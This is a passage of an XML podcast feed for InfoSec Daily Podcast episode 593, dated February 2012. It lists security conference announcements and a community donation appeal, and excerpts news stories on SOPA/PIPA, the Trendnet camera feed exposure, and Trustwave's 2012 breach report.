	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.darkreading.com/database-security/167901020/security/attacks-breaches/232600423/law-enforcement-ups-its-game-in-cybercrime.html
	It may still be a frantic game of catch-up for law enforcement, but new data quantifies anecdotal evidence that law enforcement has scored some big cybercrime busts and made inroads in detecting and investigating data breaches.
	Law enforcement officials worldwide detected five times as many breaches in 2011 as in 2010, according to new data released today in Trustwave&#39;s 2012 Global Security Report: Some 33 percent of organizations with data breaches were alerted to their fate by law enforcement, up from 7 percent in 2010. According to Trustwave, that is mostly due to work by the U.S. Secret Service, Interpol, the Australian Federal Police, and the U.K.&#39;s Serious Organised Crime Agency (SOCA).
	&#34;Law enforcement agencies have really stepped it up from a data-notification standpoint. They are apprehending criminals in possession of [stolen] data and doing a better analysis of what&#39;s happening,&#34; says Nicholas Percoco, senior vice president and head of Trustwave SpiderLabs, which based its data on more than 300 data breach investigations and 2,000 penetration tests performed by SpiderLabs worldwide in 2011.
	&#8230;.
	Source: &#160;&#160;http://www.computerworld.com/s/article/9224082/
	Trustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment
	Digital Certificate Authority (CA) Trustwave revealed that it has issued a digital certificate that enabled an unnamed private company to spy on SSL-protected connections within its corporate network, an action that prompted the Mozilla community to debate whether the CA&#39;s root certificate should be removed from Firefox.
	The certificate issued by Trustwave is known as a subordinate root and enabled its owner to sign digit[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 593 &#8211; What Wikipedia Won’t Tell You, Peep show &amp; Food Hax0ring</title>
		<link>http://www.isdpodcast.com/episode-593-what-wikipedia-wont-tell-you-peep-show-food-hax0ring</link>
		<comments>http://www.isdpodcast.com/episode-593-what-wikipedia-wont-tell-you-peep-show-food-hax0ring#comments</comments>
		<pubDate>Tue, 14 Feb 2012 02:00:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3502</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 593 for February 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.4187696834939073" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 593 for February 13, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.nytimes.com/2012/02/08/opinion/what-wikipedia-wont-tell-you.html?_r=3"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nytimes.com/2012/02/08/opinion/what-wikipedia-wont-tell-you.html?_r=3</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The digital tsunami that swept over the Capitol last month, forcing Congress to set aside legislation to combat the online piracy of American music, movies, books and other creative works, raised questions about how the democratic process functions in the digital age.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Policy makers had recognized a constitutional (and economic) imperative to protect American property from theft, to shield consumers from counterfeit products and fraud, and to combat foreign criminals who exploit technology to steal American ingenuity and jobs. They knew that music sales in the United States are less than half of what they were in 1999, when the file-sharing site Napster emerged, and that direct employment in the industry had fallen by more than half since then, to less than 10,000. They studied the problem in all its dimensions, through multiple hearings.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While no legislation is perfect, the Protect Intellectual Property Act (or PIPA) was carefully devised, with nearly unanimous bipartisan support in the Senate, and its House counterpart, the Stop Online Piracy Act (or SOPA), was based on existing statutes and Supreme Court precedents. But at the 11th hour, a flood of e-mails and phone calls to Congress stopped the legislation in its tracks. Was this the result of democracy, or demagoguery?</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Misinformation may be a dirty trick, but it works. Consider, for example, the claim that SOPA and PIPA were &ldquo;censorship,&rdquo; a loaded and inflammatory term designed to evoke images of crackdowns on pro-democracy Web sites by China or Iran. Since when is it censorship to shut down an operation that an American court, upon a thorough review of evidence, has determined to be illegal? When the police close down a store fencing stolen goods, it isn&rsquo;t censorship, but when those stolen goods are fenced online, it is?</span><a href="http://topics.nytimes.com/top/news/business/companies/wikipedia/index.html?inline=nyt-org"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wikipedia</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://topics.nytimes.com/top/news/business/companies/google_inc/index.html?inline=nyt-org"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Google</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and others manufactured controversy by unfairly equating SOPA with censorship. They also argued misleadingly that the bills would have required Web sites to &ldquo;monitor&rdquo; what their users upload, conveniently ignoring provisions like the &ldquo;No Duty to Monitor&rdquo; section.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Perhaps this is na&iuml;ve, but I&rsquo;d like to believe that the companies that opposed SOPA and PIPA will now feel some responsibility to help come up with constructive alternatives. Virtually every opponent acknowledged that the problem of counterfeiting and piracy is real and damaging. It is no longer acceptable just to say no. The diversionary bill that they drafted, the OPEN Act, would do little to stop the illegal behavior and would not establish a workable framework, standards or remedies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It has become clear that, at this point, neither SOPA, PIPA nor OPEN is a viable answer. We need to take a step back to seek fresh ideas and new approaches. The &ldquo;Copyright Alert&rdquo; program, a voluntary effort by the entertainment industries and leading Internet service providers to notify users whose accounts are being used for wrongful downloading over peer-to-peer networks, shows that respectful fact-based conversations can lead to progress.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">//Beau &#8211; I agree that lying and misinformation on any side is wrong. And I especially agree with the last paragraph. The problem isn&rsquo;t about lack of laws and the solution isn&rsquo;t more laws. Lawyers can be some of the most creative people on the planet in coming up with ways to prosecute and to defend. Perhaps ironically, this process of citing precedent to create new case law is reminiscent of mashups, deep links and the kind of fair use that opponents of SOPA, PIPA, ACTA and OPEN claim would make illegal.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">//Still Beau &#8211; In fact, the problem here is multi-fold. Congress has no power to enforce the laws already on the books, it can only harumph and create new laws. Law enforcement often can&rsquo;t take down the really egregious violators, and they seemingly too quickly play mall cop for the megabrands. The judiciary doesn&rsquo;t understand the fundamental technology and so has a hard time making the right analogies (or worse yet, they do understand what they&rsquo;re doing and the implications of some of their rulings), so burden the system with bad precedent.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">//Yep, still me &#8211; And the solution has to be multi-fold, too. Like the article says, it&rsquo;s time to take a step back and seek fresh ideas and new approaches. Like building a business model that works without resorting to lawmakers to increase revenues. Like taking some of the laws off the books that no longer apply or that don&rsquo;t make sense. Like encouraging companies who would be affected by these bills to come up with a better solution themselves that avoids lawmaking. I don&rsquo;t pretend to have all the answers, but I know that the way to solve this problem isn&rsquo;t by making congressfolk into tools (they&rsquo;re doing well enough on their own there).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.bbc.co.uk/news/technology-16919664"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bbc.co.uk/news/technology-16919664</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Feeds from thousands of Trendnet home security cameras have been breached, allowing any web user to access live footage without needing a password.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet addresses which link to the video streams have been posted to a variety of popular messageboard sites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users have expressed concern after finding they could view children&#39;s bedrooms, among other locations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">US-based Trendnet says it is in the process of releasing updates to correct a coding error introduced in 2010.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It said it had emailed customers who had registered affected devices to alert them to the problem.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, a spokesman told the BBC that &quot;roughly 5%&quot; of purchasers had registered their cameras and it had not yet issued a formal media release &#8211; despite being aware of the problem for more than three weeks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We first became aware of this on 12 January,&quot; said Zak Wood, Trendnet&#39;s director of global marketing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;As of this week we have identified 26 [vulnerable] models. (In) seven of the models, the firmware has been tested and released.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We anticipate to have all of the revised firmware available this week. We are scrambling to discover how the code was introduced and at this point it seems like a coding oversight.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr Wood added that the California-based firm estimated that &quot;fewer than 1,000 units&quot; might be open to this threat in the UK, but could not immediately provide an exact global tally beyond saying that it was &quot;most likely less than 50,000&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.securityweek.com/trustwave-hackers-target-food-and-beverage-industry-heavily-2011"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/trustwave-hackers-target-food-and-beverage-industry-heavily-2011</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is not surprising that customer records would be the main target for attackers. But a database of financial records from a major bank is not their most common target &ndash; instead it&rsquo;s </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">the food and beverage industry that has proved most appetizing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its 2012 Global Security Report, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trustwave</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> revealed that for the second year in a row, the food and beverage industry comprised nearly 44 percent of the data breach investigations in 2011. Retail businesses were the second largest group, accounting for nearly 34 percent.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report is based on an analysis of more than 300 data breach investigations and 2,000 penetration tests performed last year. According to Nicholas J. Percoco, senior vice president of Trustwave and head of SpiderLabs, the food and beverage industry in many respects represents the perfect target for an attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There is a very low barrier to entry: remote access with weak passwords or vulnerable solutions in place,&rdquo; he said in an interview with </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">SecurityWeek</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &ldquo;The attackers can have a great deal of time in the environment before being detected. The data they are after is being replenished on a daily basis.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Passwords, it turns out, are a weak link in many organizations. According to Trustwave, the problem was not just weak passwords, but shared passwords as well. The most common password used by global businesses in &ldquo;Password1,&rdquo; because it satisfies the default Microsoft Active Directory complexity setting.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;[Organizations] should be enforcing stronger passwords, but also decide to use 2-factor authentication for all accounts with remote access and/or administrative rights to systems,&rdquo; Percoco said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company investigated more than 40 percent more breaches this past year than in 2010, Percoco said. But while the number of breaches may be disconcerting, arguably even more so is that the number of breaches detected by the victimized organizations themselves stood at only 16 percent. The remaining 84 percent discovered the situation due to third-party information from regulatory, law enforcement or the public.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-593-what-wikipedia-wont-tell-you-peep-show-food-hax0ring/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3502/0/infosec-daily-podcast-episode-593.mp3" length="19330699" type="audio/mpeg" />
		<itunes:duration>0:40:13</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 593 for February 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 593 for February 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Social Engineering Training
